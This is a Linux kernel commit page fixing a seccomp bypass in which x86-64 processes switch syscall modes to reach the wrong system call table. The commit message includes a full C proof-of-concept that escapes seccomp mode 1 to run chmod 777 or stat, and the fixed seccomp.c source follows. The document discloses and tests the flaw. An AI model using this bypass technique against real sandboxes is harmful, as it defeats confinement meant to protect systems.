5b1017404a
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. */ #define _GNU_SOURCE #include <assert.h> #include <inttypes.h> #include <stdio.h> #include <linux/prctl.h> #include <sys/stat.h> #include <unistd.h> #include <asm/unistd.h> int main (int argc, char **argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: Roland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
86 lines
1.6 KiB
C
86 lines
1.6 KiB
C
/*
|
|
* linux/kernel/seccomp.c
|
|
*
|
|
* Copyright 2004-2005 Andrea Arcangeli <andrea@cpushare.com>
|
|
*
|
|
* This defines a simple but solid secure-computing mode.
|
|
*/
|
|
|
|
#include <linux/seccomp.h>
|
|
#include <linux/sched.h>
|
|
#include <linux/compat.h>
|
|
|
|
/* #define SECCOMP_DEBUG 1 */
|
|
#define NR_SECCOMP_MODES 1
|
|
|
|
/*
|
|
* Secure computing mode 1 allows only read/write/exit/sigreturn.
|
|
* To be fully secure this must be combined with rlimit
|
|
* to limit the stack allocations too.
|
|
*/
|
|
static int mode1_syscalls[] = {
|
|
__NR_seccomp_read, __NR_seccomp_write, __NR_seccomp_exit, __NR_seccomp_sigreturn,
|
|
0, /* null terminated */
|
|
};
|
|
|
|
#ifdef CONFIG_COMPAT
|
|
static int mode1_syscalls_32[] = {
|
|
__NR_seccomp_read_32, __NR_seccomp_write_32, __NR_seccomp_exit_32, __NR_seccomp_sigreturn_32,
|
|
0, /* null terminated */
|
|
};
|
|
#endif
|
|
|
|
void __secure_computing(int this_syscall)
|
|
{
|
|
int mode = current->seccomp.mode;
|
|
int * syscall;
|
|
|
|
switch (mode) {
|
|
case 1:
|
|
syscall = mode1_syscalls;
|
|
#ifdef CONFIG_COMPAT
|
|
if (is_compat_task())
|
|
syscall = mode1_syscalls_32;
|
|
#endif
|
|
do {
|
|
if (*syscall == this_syscall)
|
|
return;
|
|
} while (*++syscall);
|
|
break;
|
|
default:
|
|
BUG();
|
|
}
|
|
|
|
#ifdef SECCOMP_DEBUG
|
|
dump_stack();
|
|
#endif
|
|
do_exit(SIGKILL);
|
|
}
|
|
|
|
long prctl_get_seccomp(void)
|
|
{
|
|
return current->seccomp.mode;
|
|
}
|
|
|
|
long prctl_set_seccomp(unsigned long seccomp_mode)
|
|
{
|
|
long ret;
|
|
|
|
/* can set it only once to be even more secure */
|
|
ret = -EPERM;
|
|
if (unlikely(current->seccomp.mode))
|
|
goto out;
|
|
|
|
ret = -EINVAL;
|
|
if (seccomp_mode && seccomp_mode <= NR_SECCOMP_MODES) {
|
|
current->seccomp.mode = seccomp_mode;
|
|
set_thread_flag(TIF_SECCOMP);
|
|
#ifdef TIF_NOTSC
|
|
disable_TSC();
|
|
#endif
|
|
ret = 0;
|
|
}
|
|
|
|
out:
|
|
return ret;
|
|
}
|